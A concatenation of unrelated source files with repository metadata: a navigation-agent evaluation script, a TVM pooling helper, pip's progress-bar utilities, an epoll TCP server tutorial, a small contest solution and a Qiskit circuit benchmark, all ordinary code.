    # Heating rate
    Gamma = 1e-26
    # Cooling length in parsec
    dcool = 3*(1e5*v1)*(1.3806503e-16 * T1*T0) / (n1*(Lambda - Gamma)) / 3.085677582e18
    # Mask out sub-sonic velocities (no shock there).
    dcool[vv < cs] = np.nan
    # Ratio with respect to adiabatic shell thickness
    # NOTE(review): h1 is computed but unused; cool_ratio1 divides by R0,
    # not h1 — confirm which was intended.
    h1 = 0.177*R0
    cool_ratio1 = dcool / R0
    # Ratio with respect to isothermal shell thickness
    h2 = 3*R0/(4*M0**2) * (2 / (1 + np.sqrt(1 + (18/M0**2)) ))
    cool_ratio2 = dcool / h2
    # Overlay the d_cool = R0 and d_cool = h0 boundary curves.
    cs = ax.contour(vv, nn, cool_ratio1, (1.0,), linewidths=2, colors='b', alpha=0.5)
    ax.clabel(cs,
              fontsize='xx-small', fmt=r"$d_\mathrm{cool} = R_0$",
              inline=True, inline_spacing=2, use_clabeltext=True)
    cs = ax.contour(vv, nn, cool_ratio2, (1.0,), linewidths=1, colors='b', alpha=0.5)
    ax.clabel(cs,
              fontsize='xx-small', fmt=r"$d_\mathrm{cool} = h_0$",
              inline=True, inline_spacing=2, use_clabeltext=True)

    ax.set(yscale='log')

axes.set(xlabel=r"$v$, km s$^{-1}$", ylabel=r"$n$, cm$^{-3}$")
sns.despine()
fig.tight_layout()
fig.savefig(figname)
print(figname, end='')
[ "will@henney.org" ]
will@henney.org
84b098542f09ce09f47cdfecd5c51858d6f9b957
088314e3bd6ca7ef34d15f2aa45b743b363641d9
/tasks/NDH/eval.py
c642e81a150d653a372f2db34e9c4c14b3f370b0
[ "MIT" ]
permissive
weituo12321/PREVALENT_R2R
7a27d580fcbe8f72a209697d053ca3eb2013e3a0
868fb53d6b7978bbb10439a59e65044c811ee5c2
refs/heads/master
2022-11-24T00:54:32.385940
2020-07-24T17:56:42
2020-07-24T17:56:42
248,832,547
8
7
MIT
2022-11-22T02:10:54
2020-03-20T19:07:08
Python
UTF-8
Python
false
false
8,272
py
''' Evaluation of agent trajectories '''

import json
import os
import sys
from collections import defaultdict
import networkx as nx
import numpy as np
import pprint
pp = pprint.PrettyPrinter(indent=4)

from env import R2RBatch
from utils import load_datasets, load_nav_graphs
from agent import BaseAgent, StopAgent, RandomAgent, ShortestAgent


class Evaluation(object):
    ''' Results submission format:  [{'instr_id': string, 'trajectory':[(viewpoint_id, heading_rads, elevation_rads),] } ] '''

    def __init__(self, splits, path_type='planner_path'):
        # Success radius (metres) around the goal viewpoint.
        self.error_margin = 3.0
        self.splits = splits
        self.gt = {}          # inst_idx -> ground-truth item
        self.instr_ids = []
        self.scans = []
        for item in load_datasets(splits):
            self.gt[item['inst_idx']] = item
            self.instr_ids.append(item['inst_idx'])
            self.scans.append(item['scan'])

            # Add 'trusted_path' to gt metadata if necessary.
            # Trusted = player path when it passes through the planner's
            # goal, otherwise fall back to the planner path.
            if path_type == 'trusted_path':
                planner_goal = item['planner_path'][-1]
                if planner_goal in item['player_path'][1:]:
                    self.gt[item['inst_idx']]['trusted_path'] = item['player_path'][:]
                else:
                    self.gt[item['inst_idx']]['trusted_path'] = item['planner_path'][:]

        self.scans = set(self.scans)
        self.instr_ids = set(self.instr_ids)
        self.graphs = load_nav_graphs(self.scans)
        # Per-scan all-pairs shortest-path distances (metres).
        self.distances = {}
        self.path_type = path_type
        for scan, G in self.graphs.items():  # compute all shortest paths
            self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))

    def _get_nearest(self, scan, goal_id, path):
        # Return the viewpoint on `path` with the smallest graph distance
        # to goal_id (used for the oracle stopping rule).
        near_id = path[0][0]
        near_d = self.distances[scan][near_id][goal_id]
        for item in path:
            d = self.distances[scan][item[0]][goal_id]
            if d < near_d:
                near_id = item[0]
                near_d = d
        return near_id

    def _score_item(self, instr_id, path):
        ''' Calculate error based on the final position in trajectory, and also
            the closest position (oracle stopping rule). '''
        gt = self.gt[int(instr_id)]
        start = gt[self.path_type][0]
        assert start == path[0][0], 'Result trajectories should include the start position'
        goal = gt[self.path_type][-1]
        planner_goal = gt['planner_path'][-1]  # for calculating oracle planner success (e.g., passed over desc goal?)
        final_position = path[-1][0]
        nearest_position = self._get_nearest(gt['scan'], goal, path)
        nearest_planner_position = self._get_nearest(gt['scan'], planner_goal, path)
        # Distance-to-end-region: closest end pano from the start vs from
        # the final position; their difference is the "goal progress".
        dist_to_end_start = None
        dist_to_end_end = None
        for end_pano in gt['end_panos']:
            d = self.distances[gt['scan']][start][end_pano]
            if dist_to_end_start is None or d < dist_to_end_start:
                dist_to_end_start = d
            d = self.distances[gt['scan']][final_position][end_pano]
            if dist_to_end_end is None or d < dist_to_end_end:
                dist_to_end_end = d
        self.scores['nav_errors'].append(self.distances[gt['scan']][final_position][goal])
        self.scores['oracle_errors'].append(self.distances[gt['scan']][nearest_position][goal])
        self.scores['oracle_plan_errors'].append(self.distances[gt['scan']][nearest_planner_position][planner_goal])
        self.scores['dist_to_end_reductions'].append(dist_to_end_start - dist_to_end_end)
        distance = 0  # Work out the length of the path in meters
        prev = path[0]
        for curr in path[1:]:
            if prev[0] != curr[0]:
                # Probe the graph purely to validate that the hop exists.
                try:
                    self.graphs[gt['scan']][prev[0]][curr[0]]
                except KeyError as err:
                    print('Error: The provided trajectory moves from %s to %s but the navigation graph contains no '\
                        'edge between these viewpoints. Please ensure the provided navigation trajectories '\
                        'are valid, so that trajectory length can be accurately calculated.' % (prev[0], curr[0]))
                    raise
            distance += self.distances[gt['scan']][prev[0]][curr[0]]
            prev = curr
        self.scores['trajectory_lengths'].append(distance)
        self.scores['shortest_path_lengths'].append(self.distances[gt['scan']][start][goal])

    def score(self, output_file):
        ''' Evaluate each agent trajectory based on how close it got to the goal location '''
        # Accumulate per-item metrics into self.scores, then aggregate.
        self.scores = defaultdict(list)
        instr_ids = set(self.instr_ids)
        with open(output_file) as f:
            for item in json.load(f):
                # Check against expected ids
                if item['inst_idx'] in instr_ids:
                    instr_ids.remove(item['inst_idx'])
                    self._score_item(item['inst_idx'], item['trajectory'])
        assert len(instr_ids) == 0, 'Trajectories not provided for %d instruction ids: %s' % (len(instr_ids), instr_ids)
        assert len(self.scores['nav_errors']) == len(self.instr_ids)
        num_successes = len([i for i in self.scores['nav_errors'] if i < self.error_margin])
        # Boolean mask of successful episodes, reused for 'sc_dr' below.
        sc_idx = np.array([i < self.error_margin for i in self.scores['nav_errors']])
        oracle_successes = len([i for i in self.scores['oracle_errors'] if i < self.error_margin])
        oracle_plan_successes = len([i for i in self.scores['oracle_plan_errors'] if i < self.error_margin])
        # SPL: success weighted by (shortest / max(actual, shortest)).
        spls = []
        for err, length, sp in zip(self.scores['nav_errors'], self.scores['trajectory_lengths'], self.scores['shortest_path_lengths']):
            if err < self.error_margin:
                if sp > 0:
                    spls.append(sp / max(length, sp))
                else:  # In IF, some Q/A pairs happen when we're already in the goal region, so taking no action is correct.
                    spls.append(1 if length == 0 else 0)
            else:
                spls.append(0)
        score_summary = {
            'length': np.average(self.scores['trajectory_lengths']),
            'nav_error': np.average(self.scores['nav_errors']),
            'oracle success_rate': float(oracle_successes)/float(len(self.scores['oracle_errors'])),
            'success_rate': float(num_successes)/float(len(self.scores['nav_errors'])),
            'spl': np.average(spls),
            'oracle path_success_rate': float(oracle_plan_successes)/float(len(self.scores['oracle_plan_errors'])),
            'dist_to_end_reduction': sum(self.scores['dist_to_end_reductions']) / float(len(self.scores['dist_to_end_reductions'])),
            'sc_dr': sum(np.array(self.scores['dist_to_end_reductions'])[sc_idx]) / float(len(self.scores['dist_to_end_reductions']))
        }
        assert score_summary['spl'] <= score_summary['success_rate']
        return score_summary, self.scores


RESULT_DIR = 'tasks/NDH/results/'


def eval_simple_agents():
    # path_type = 'planner_path'
    # path_type = 'player_path'
    path_type = 'trusted_path'

    ''' Run simple baselines on each split. '''
    for split in ['train', 'val_seen', 'val_unseen', 'test']:
        env = R2RBatch(None, batch_size=1, splits=[split], path_type=path_type)
        ev = Evaluation([split], path_type=path_type)

        for agent_type in ['Stop', 'Shortest', 'Random']:
            outfile = '%s%s_%s_agent.json' % (RESULT_DIR, split, agent_type.lower())
            agent = BaseAgent.get_agent(agent_type)(env, outfile)
            agent.test()
            agent.write_results()
            score_summary, _ = ev.score(outfile)
            print('\n%s' % agent_type)
            pp.pprint(score_summary)


def eval_seq2seq():
    ''' Eval sequence to sequence models on val splits (iteration selected from training error) '''
    outfiles = [
        RESULT_DIR + 'seq2seq_teacher_imagenet_%s_iter_5000.json',
        RESULT_DIR + 'seq2seq_sample_imagenet_%s_iter_20000.json'
    ]
    for outfile in outfiles:
        for split in ['val_seen', 'val_unseen']:
            ev = Evaluation([split])
            score_summary, _ = ev.score(outfile % split)
            print('\n%s' % outfile)
            pp.pprint(score_summary)


if __name__ == '__main__':
    eval_simple_agents()
    #eval_seq2seq()
[ "weituo.hao@gmail.com" ]
weituo.hao@gmail.com
5e388aaa8b1c889e2a5ad3e841a1666c7eaea2b3
74b12c96a73d464e3ca3241ae83a0b6fe984b913
/python/tvm/relay/backend/contrib/ethosu/tir/pooling.py
7fdebf05f068c8a5c0a9529650aaaf625625f4c4
[ "Apache-2.0", "BSD-3-Clause", "Zlib", "MIT", "LicenseRef-scancode-unknown-license-reference", "Unlicense", "BSD-2-Clause" ]
permissive
masahi/tvm
cf765bb892655f02135e1ce3afde88698f026483
c400f7e871214451b75f20f4879992becfe5e3a4
refs/heads/master
2023-08-22T20:46:25.795382
2022-04-13T08:47:10
2022-04-13T08:47:10
138,661,036
4
2
Apache-2.0
2021-09-03T20:35:19
2018-06-25T23:39:51
Python
UTF-8
Python
false
false
3,729
py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
"""Extract information from the pooling operators in TIR."""
from typing import Dict, Tuple

import tvm

from .utils import get_outer_loops, get_op_attrs, get_loads, get_stores
from .dma import get_ifm_params, get_ofm_params
from .spec import SerialKernel, SerialActivation, SerialPooling


def get_pooling_params(
    stmt: tvm.tir.AttrStmt,
    producers: Dict[tvm.tir.Var, tvm.tir.AttrStmt],
    consumers: Dict[tvm.tir.Var, tvm.tir.AttrStmt],
) -> Tuple[SerialPooling, tvm.tir.Var, tvm.tir.Var]:
    """Get the parameters necessary to construct a call_extern for a pooling.

    Parameters
    ----------
    stmt : tvm.tir.AttrStmt
        The outermost attribute statement of a convolution loop nest.
    producers : Dict[tvm.tir.Var, tvm.tir.AttrStmt]
        A dictionary to associate pointers with the loop nest
        that produces their values.
    consumers : Dict[tvm.tir.Var, tvm.tir.AttrStmt]
        A dictionary to associate pointers with the loop nest
        that consumes their values.

    Returns
    -------
    SerialPooling
        The parameters needed to construct a 2D convolution.
    output_pointer : tvm.tir.Var
        The output pointer of the convolution operation.
    replace_pointer : tvm.tir.Var
        The output pointer of the DMA write operation, which is to replace
        the convolution output pointer.
    is_allocator : bool
        Whether this operator allocates its output.

    """
    attrs, body = get_op_attrs(stmt)
    # Only the two innermost loops (pool height, then pool width) carry the
    # information we need; the NHWC outer loops are discarded.
    _, _, _, _, _, pool_h_loop = get_outer_loops(body, "NHWC")
    pool_w_loop = pool_h_loop.body
    compute = pool_w_loop.body

    # loads = [output, input, LUT, LUT]
    loads = get_loads(compute)
    # stores = [output]
    stores = get_stores(compute)
    input_pointer = loads[1].buffer.data
    output_pointer = stores[0].buffer.data

    # Get feature map info
    serial_ifm, serial_padding = get_ifm_params(input_pointer, producers)
    serial_ofm, serial_block_config, replace_pointer, is_allocator = get_ofm_params(
        output_pointer, consumers, producers
    )

    # Get kernel info — the pool window extents come straight from the two
    # inner loops; pooling has no dilation.
    serial_kernel = SerialKernel(
        width=int(pool_w_loop.extent),
        height=int(pool_h_loop.extent),
        stride_w=int(attrs["stride_w"]),
        stride_h=int(attrs["stride_h"]),
        dilation_w=1,
        dilation_h=1,
    )

    # Get activation info
    serial_activation = SerialActivation(
        op=attrs["activation"], clip_min=attrs["clip_min"], clip_max=attrs["clip_max"]
    )

    serial_pooling = SerialPooling(
        ifm=serial_ifm,
        ofm=serial_ofm,
        pooling_type=attrs["pooling_type"],
        pool_shape=serial_kernel,
        padding=serial_padding,
        activation=serial_activation,
        rounding_mode=attrs["rounding_mode"],
        upscale=attrs["upscale"],
        block_config=serial_block_config,
    )
    return serial_pooling, output_pointer, replace_pointer, is_allocator
[ "noreply@github.com" ]
masahi.noreply@github.com
79e117c269dacbcef4971383833eb94557dd58d8
b48ca98425b9510d16623277a0761a33c00d028d
/SeatReservation-Version3.0/SeatReservation-master/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/utils/ui.py
f036ae7639247d194c377af4e8f5227175c154ff
[]
no_license
billgoo/WHULibSeatReservation
f74a01db19f51a2034772d932c59afd9f63c7753
5423ef7df253739ccf279365c1dec1ebfe7f2c4f
refs/heads/master
2020-04-02T07:18:33.174744
2018-12-23T15:26:15
2018-12-23T15:26:15
154,190,237
0
1
null
null
null
null
UTF-8
Python
false
false
11,872
py
import itertools import sys from signal import signal, SIGINT, default_int_handler import time import contextlib import logging from pip.compat import WINDOWS from pip.utils import format_size from pip.utils.logging import get_indentation from pip._vendor import six from pip._vendor.progress.bar import Bar, IncrementalBar from pip._vendor.progress.helpers import (WritelnMixin, HIDE_CURSOR, SHOW_CURSOR) from pip._vendor.progress.spinner import Spinner try: from pip._vendor import colorama # Lots of different errors can come from this, including SystemError and # ImportError. except Exception: colorama = None logger = logging.getLogger(__name__) def _select_progress_class(preferred, fallback): encoding = getattr(preferred.file, "encoding", None) # If we don't know what encoding this file is in, then we'll just assume # that it doesn't support unicode and use the ASCII bar. if not encoding: return fallback # Collect all of the possible characters we want to use with the preferred # bar. characters = [ getattr(preferred, "empty_fill", six.text_type()), getattr(preferred, "fill", six.text_type()), ] characters += list(getattr(preferred, "phases", [])) # Try to decode the characters we're using for the bar using the encoding # of the given file, if this works then we'll assume that we can use the # fancier bar and if not we'll fall back to the plaintext bar. try: six.text_type().join(characters).encode(encoding) except UnicodeEncodeError: return fallback else: return preferred _BaseBar = _select_progress_class(IncrementalBar, Bar) class InterruptibleMixin(object): """ Helper to ensure that self.finish() gets called on keyboard interrupt. This allows downloads to be interrupted without leaving temporary state (like hidden cursors) behind. This class is similar to the progress library's existing SigIntMixin helper, but as of version 1.2, that helper has the following problems: 1. It calls sys.exit(). 2. It discards the existing SIGINT handler completely. 3. 
It leaves its own handler in place even after an uninterrupted finish, which will have unexpected delayed effects if the user triggers an unrelated keyboard interrupt some time after a progress-displaying download has already completed, for example. """ def __init__(self, *args, **kwargs): """ Save the original SIGINT handler for later. """ super(InterruptibleMixin, self).__init__(*args, **kwargs) self.original_handler = signal(SIGINT, self.handle_sigint) # If signal() returns None, the previous handler was not installed from # Python, and we cannot restore it. This probably should not happen, # but if it does, we must restore something sensible instead, at least. # The least bad option should be Python's default SIGINT handler, which # just raises KeyboardInterrupt. if self.original_handler is None: self.original_handler = default_int_handler def finish(self): """ Restore the original SIGINT handler after finishing. This should happen regardless of whether the progress display finishes normally, or gets interrupted. """ super(InterruptibleMixin, self).finish() signal(SIGINT, self.original_handler) def handle_sigint(self, signum, frame): """ Call self.finish() before delegating to the original SIGINT handler. This handler should only be in place while the progress display is active. """ self.finish() self.original_handler(signum, frame) class DownloadProgressMixin(object): def __init__(self, *args, **kwargs): super(DownloadProgressMixin, self).__init__(*args, **kwargs) self.message = (" " * (get_indentation() + 2)) + self.message @property def downloaded(self): return format_size(self.index) @property def download_speed(self): # Avoid zero division errors... if self.avg == 0.0: return "..." 
return format_size(1 / self.avg) + "/s" @property def pretty_eta(self): if self.eta: return "eta %s" % self.eta_td return "" def iter(self, it, n=1): for x in it: yield x self.next(n) self.finish() class WindowsMixin(object): def __init__(self, *args, **kwargs): # The Windows terminal does not support the hide/show cursor ANSI codes # even with colorama. So we'll ensure that hide_cursor is False on # Windows. # This call neds to go before the super() call, so that hide_cursor # is set in time. The base progress bar class writes the "hide cursor" # code to the terminal in its init, so if we don't set this soon # enough, we get a "hide" with no corresponding "show"... if WINDOWS and self.hide_cursor: self.hide_cursor = False super(WindowsMixin, self).__init__(*args, **kwargs) # Check if we are running on Windows and we have the colorama module, # if we do then wrap our file with it. if WINDOWS and colorama: self.file = colorama.AnsiToWin32(self.file) # The progress code expects to be able to call self.file.isatty() # but the colorama.AnsiToWin32() object doesn't have that, so we'll # add it. self.file.isatty = lambda: self.file.wrapped.isatty() # The progress code expects to be able to call self.file.flush() # but the colorama.AnsiToWin32() object doesn't have that, so we'll # add it. 
self.file.flush = lambda: self.file.wrapped.flush() class DownloadProgressBar(WindowsMixin, InterruptibleMixin, DownloadProgressMixin, _BaseBar): file = sys.stdout message = "%(percent)d%%" suffix = "%(downloaded)s %(download_speed)s %(pretty_eta)s" class DownloadProgressSpinner(WindowsMixin, InterruptibleMixin, DownloadProgressMixin, WritelnMixin, Spinner): file = sys.stdout suffix = "%(downloaded)s %(download_speed)s" def next_phase(self): if not hasattr(self, "_phaser"): self._phaser = itertools.cycle(self.phases) return next(self._phaser) def update(self): message = self.message % self phase = self.next_phase() suffix = self.suffix % self line = ''.join([ message, " " if message else "", phase, " " if suffix else "", suffix, ]) self.writeln(line) ################################################################ # Generic "something is happening" spinners # # We don't even try using progress.spinner.Spinner here because it's actually # simpler to reimplement from scratch than to coerce their code into doing # what we need. ################################################################ @contextlib.contextmanager def hidden_cursor(file): # The Windows terminal does not support the hide/show cursor ANSI codes, # even via colorama. So don't even try. if WINDOWS: yield # We don't want to clutter the output with control characters if we're # writing to a file, or if the user is running with --quiet. 
# See https://github.com/pypa/pip/issues/3418 elif not file.isatty() or logger.getEffectiveLevel() > logging.INFO: yield else: file.write(HIDE_CURSOR) try: yield finally: file.write(SHOW_CURSOR) class RateLimiter(object): def __init__(self, min_update_interval_seconds): self._min_update_interval_seconds = min_update_interval_seconds self._last_update = 0 def ready(self): now = time.time() delta = now - self._last_update return delta >= self._min_update_interval_seconds def reset(self): self._last_update = time.time() class InteractiveSpinner(object): def __init__(self, message, file=None, spin_chars="-\\|/", # Empirically, 8 updates/second looks nice min_update_interval_seconds=0.125): self._message = message if file is None: file = sys.stdout self._file = file self._rate_limiter = RateLimiter(min_update_interval_seconds) self._finished = False self._spin_cycle = itertools.cycle(spin_chars) self._file.write(" " * get_indentation() + self._message + " ... ") self._width = 0 def _write(self, status): assert not self._finished # Erase what we wrote before by backspacing to the beginning, writing # spaces to overwrite the old text, and then backspacing again backup = "\b" * self._width self._file.write(backup + " " * self._width + backup) # Now we have a blank slate to add our status self._file.write(status) self._width = len(status) self._file.flush() self._rate_limiter.reset() def spin(self): if self._finished: return if not self._rate_limiter.ready(): return self._write(next(self._spin_cycle)) def finish(self, final_status): if self._finished: return self._write(final_status) self._file.write("\n") self._file.flush() self._finished = True # Used for dumb terminals, non-interactive installs (no tty), etc. # We still print updates occasionally (once every 60 seconds by default) to # act as a keep-alive for systems like Travis-CI that take lack-of-output as # an indication that a task has frozen. 
class NonInteractiveSpinner(object): def __init__(self, message, min_update_interval_seconds=60): self._message = message self._finished = False self._rate_limiter = RateLimiter(min_update_interval_seconds) self._update("started") def _update(self, status): assert not self._finished self._rate_limiter.reset() logger.info("%s: %s", self._message, status) def spin(self): if self._finished: return if not self._rate_limiter.ready(): return self._update("still running...") def finish(self, final_status): if self._finished: return self._update("finished with status '%s'" % (final_status,)) self._finished = True @contextlib.contextmanager def open_spinner(message): # Interactive spinner goes directly to sys.stdout rather than being routed # through the logging system, but it acts like it has level INFO, # i.e. it's only displayed if we're at level INFO or better. # Non-interactive spinner goes through the logging system, so it is always # in sync with logging configuration. if sys.stdout.isatty() and logger.getEffectiveLevel() <= logging.INFO: spinner = InteractiveSpinner(message) else: spinner = NonInteractiveSpinner(message) try: with hidden_cursor(sys.stdout): yield spinner except KeyboardInterrupt: spinner.finish("canceled") raise except Exception: spinner.finish("error") raise else: spinner.finish("done")
[ "noreply@github.com" ]
billgoo.noreply@github.com
9042bc2e7dfed5812249fb189fa1277d8d1c2be2
8f26514c451e2398d5e3688c184ea74d1dad21b2
/month_02/teacher/day16/epoll_server.py
d519fab12014a4ac0890707f142243e5f1733a11
[]
no_license
CircularWorld/Python_exercise
25e7aebe45b4d2ee4e3e3afded082c56483117de
96d4d9c5c626f418803f44584c5350b7ce514368
refs/heads/master
2022-11-21T07:29:39.054971
2020-07-20T10:12:24
2020-07-20T10:12:24
281,081,559
0
1
null
null
null
null
UTF-8
Python
false
false
1,421
py
""" 基于epoll方法实现IO并发 重点代码 ! """ from socket import * from select import * # 全局变量 HOST = "0.0.0.0" PORT = 8889 ADDR = (HOST,PORT) # 创建tcp套接字 tcp_socket = socket() tcp_socket.bind(ADDR) tcp_socket.listen(5) # 设置为非阻塞 tcp_socket.setblocking(False) p = epoll() # 建立epoll对象 p.register(tcp_socket,EPOLLIN) # 初始监听对象 # 准备工作,建立文件描述符 和 IO对象对应的字典 时刻与register的IO一致 map = {tcp_socket.fileno():tcp_socket} # 循环监听 while True: # 对关注的IO进行监控 events = p.poll() # events--> [(fileno,event),()....] for fd,event in events: # 分情况讨论 if fd == tcp_socket.fileno(): # 处理客户端连接 connfd, addr = map[fd].accept() print("Connect from", addr) connfd.setblocking(False) # 设置非阻塞 p.register(connfd,EPOLLIN|EPOLLERR) # 添加到监控 map[connfd.fileno()] = connfd # 同时维护字典 elif event == EPOLLIN: # 收消息 data = map[fd].recv(1024) if not data: # 客户端退出 p.unregister(fd) # 移除关注 map[fd].close() del map[fd] # 从字典也移除 continue print(data.decode()) map[fd].send(b'OK')
[ "jiayuhaowork@163.com" ]
jiayuhaowork@163.com
6ab5b5216d0eb2a8650fcd1a62bcbabf049f5313
bf99b1b14e9ca1ad40645a7423f23ef32f4a62e6
/AtCoder/abc/089c_2.py
94da387294f84700a87543a31909ed7bb1b5e285
[]
no_license
y-oksaku/Competitive-Programming
3f9c1953956d1d1dfbf46d5a87b56550ff3ab3db
a3ff52f538329bed034d3008e051f30442aaadae
refs/heads/master
2021-06-11T16:14:12.635947
2021-05-04T08:18:35
2021-05-04T08:18:35
188,639,647
0
0
null
null
null
null
UTF-8
Python
false
false
344
py
from itertools import combinations from collections import defaultdict import sys input = sys.stdin.readline N = int(input()) cnt = defaultdict(int) for _ in range(N): s = input() cnt[s[0]] += 1 ans = 0 for h in combinations(['M', 'A', 'R', 'C', 'H'], r=3): prd = 1 for s in h: prd *= cnt[s] ans += prd print(ans)
[ "y.oksaku@stu.kanazawa-u.ac.jp" ]
y.oksaku@stu.kanazawa-u.ac.jp
9515c0bdd85d803050097e6ea7dac81417d8aa7d
09e57dd1374713f06b70d7b37a580130d9bbab0d
/benchmark/startQiskit_QC2883.py
3831cd0f21334b15907eb8542ea5d15be806d7d0
[ "BSD-3-Clause" ]
permissive
UCLA-SEAL/QDiff
ad53650034897abb5941e74539e3aee8edb600ab
d968cbc47fe926b7f88b4adf10490f1edd6f8819
refs/heads/main
2023-08-05T04:52:24.961998
2021-09-19T02:56:16
2021-09-19T02:56:16
405,159,939
2
0
null
null
null
null
UTF-8
Python
false
false
4,471
py
# qubit number=4 # total number=40 import cirq import qiskit from qiskit import IBMQ from qiskit.providers.ibmq import least_busy from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister from qiskit import BasicAer, execute, transpile from pprint import pprint from qiskit.test.mock import FakeVigo from math import log2 import numpy as np import networkx as nx def bitwise_xor(s: str, t: str) -> str: length = len(s) res = [] for i in range(length): res.append(str(int(s[i]) ^ int(t[i]))) return ''.join(res[::-1]) def bitwise_dot(s: str, t: str) -> str: length = len(s) res = 0 for i in range(length): res += int(s[i]) * int(t[i]) return str(res % 2) def build_oracle(n: int, f) -> QuantumCircuit: # implement the oracle O_f # NOTE: use multi_control_toffoli_gate ('noancilla' mode) # https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html # https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates # https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate controls = QuantumRegister(n, "ofc") target = QuantumRegister(1, "oft") oracle = QuantumCircuit(controls, target, name="Of") for i in range(2 ** n): rep = np.binary_repr(i, n) if f(rep) == "1": for j in range(n): if rep[j] == "0": oracle.x(controls[j]) oracle.mct(controls, target[0], None, mode='noancilla') for j in range(n): if rep[j] == "0": oracle.x(controls[j]) # oracle.barrier() return oracle def make_circuit(n:int,f) -> QuantumCircuit: # circuit begin input_qubit = QuantumRegister(n,"qc") classical = ClassicalRegister(n, "qm") prog = QuantumCircuit(input_qubit, classical) prog.h(input_qubit[3]) # number=20 prog.cz(input_qubit[0],input_qubit[3]) # number=21 prog.h(input_qubit[3]) # number=22 prog.x(input_qubit[3]) # number=13 prog.h(input_qubit[3]) # number=23 prog.cz(input_qubit[0],input_qubit[3]) # number=24 prog.h(input_qubit[3]) # 
number=25 prog.h(input_qubit[1]) # number=2 prog.h(input_qubit[2]) # number=3 prog.h(input_qubit[3]) # number=4 prog.h(input_qubit[0]) # number=5 prog.y(input_qubit[2]) # number=18 prog.cx(input_qubit[3],input_qubit[0]) # number=37 prog.z(input_qubit[3]) # number=38 prog.cx(input_qubit[3],input_qubit[0]) # number=39 oracle = build_oracle(n-1, f) prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]]) prog.h(input_qubit[1]) # number=6 prog.h(input_qubit[2]) # number=7 prog.h(input_qubit[3]) # number=8 prog.h(input_qubit[0]) # number=9 prog.h(input_qubit[0]) # number=33 prog.cz(input_qubit[2],input_qubit[0]) # number=34 prog.h(input_qubit[0]) # number=35 prog.h(input_qubit[1]) # number=19 prog.h(input_qubit[0]) # number=15 prog.cz(input_qubit[2],input_qubit[0]) # number=16 prog.h(input_qubit[0]) # number=17 prog.rx(1.6838936623241292,input_qubit[2]) # number=36 prog.y(input_qubit[1]) # number=26 prog.y(input_qubit[1]) # number=27 prog.swap(input_qubit[1],input_qubit[0]) # number=29 prog.swap(input_qubit[1],input_qubit[0]) # number=30 prog.x(input_qubit[0]) # number=31 prog.x(input_qubit[0]) # number=32 # circuit end for i in range(n): prog.measure(input_qubit[i], classical[i]) return prog if __name__ == '__main__': a = "111" b = "0" f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b) prog = make_circuit(4,f) IBMQ.load_account() provider = IBMQ.get_provider(hub='ibm-q') provider.backends() backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True)) sample_shot =8000 info = execute(prog, backend=backend, shots=sample_shot).result().get_counts() backend = FakeVigo() circuit1 = transpile(prog,backend,optimization_level=2) writefile = open("../data/startQiskit_QC2883.csv","w") print(info,file=writefile) print("results end", file=writefile) print(circuit1.__len__(),file=writefile) print(circuit1,file=writefile) writefile.close()
[ "wangjiyuan123@yeah.net" ]
wangjiyuan123@yeah.net
fc65a08e5902987c77d2744f2246f2ddbcaabf20
2ce27b05f45cef6ce3ae5c02b8e83e548def2fc6
/ADVANCE/Functions/Built in Function/reversed( ).py
dee1fad79a5a200d090d2edf08814e238497790f
[]
no_license
Ajay2521/Python
775b7d99736e83e4d0c37302b91d1413dd2c0d3b
a426dd7717de8a5e60e584d208ae7120bb84c1b3
refs/heads/master
2022-12-01T17:49:12.672061
2020-08-15T14:55:12
2020-08-15T14:55:12
273,632,074
1
0
null
null
null
null
UTF-8
Python
false
false
957
py
# In this lets see about the "Built-in functions" in python. # Built-in function is defined as the functions whose functionality is pre-defined in the python compiler. # Lets see about "reversed( ) bilt-in function" in python. # reversed( ) - Used to returns the reversed iterator of the given sequence. # Here is the program for reversed( ). String = "MaayoN" List = [ 1, 2, 3, 4, 5 ] Tuple = ( 1, 2, 3, 4, 5 ) print( ) # prints empty line for readability. print( reversed( String ) ) print ( list( reversed( String ) ) ) # Converting reversed value into List for readability. print( ) # prints empty line for readability. print( reversed( List ) ) print ( list( reversed( List ) ) ) # Converting reversed value into List for readability. print( ) # prints empty line for readability. print( reversed( Tuple ) ) print ( list( reversed( Tuple ) ) ) # Converting reversed value into List for readability.
[ "noreply@github.com" ]
Ajay2521.noreply@github.com
2f7fe328ac611be8426399a64197dce120f4b2ec
978e8e7397237a269ce55dff551aee65948d3803
/trading/settings.py
5f9f8f43ae749e67986d13bd7fa39f95cfc9ae2c
[]
no_license
AlexsandroMO/Bitcoin
cca28beeb712b63f31c7ef1c54aced47d8de3153
e19498660d5e3a9fdaee7fdb17e9a5464ebdac8d
refs/heads/master
2020-09-26T02:47:41.616660
2019-12-05T16:48:48
2019-12-05T16:48:48
226,146,249
0
0
null
null
null
null
UTF-8
Python
false
false
2,176
py
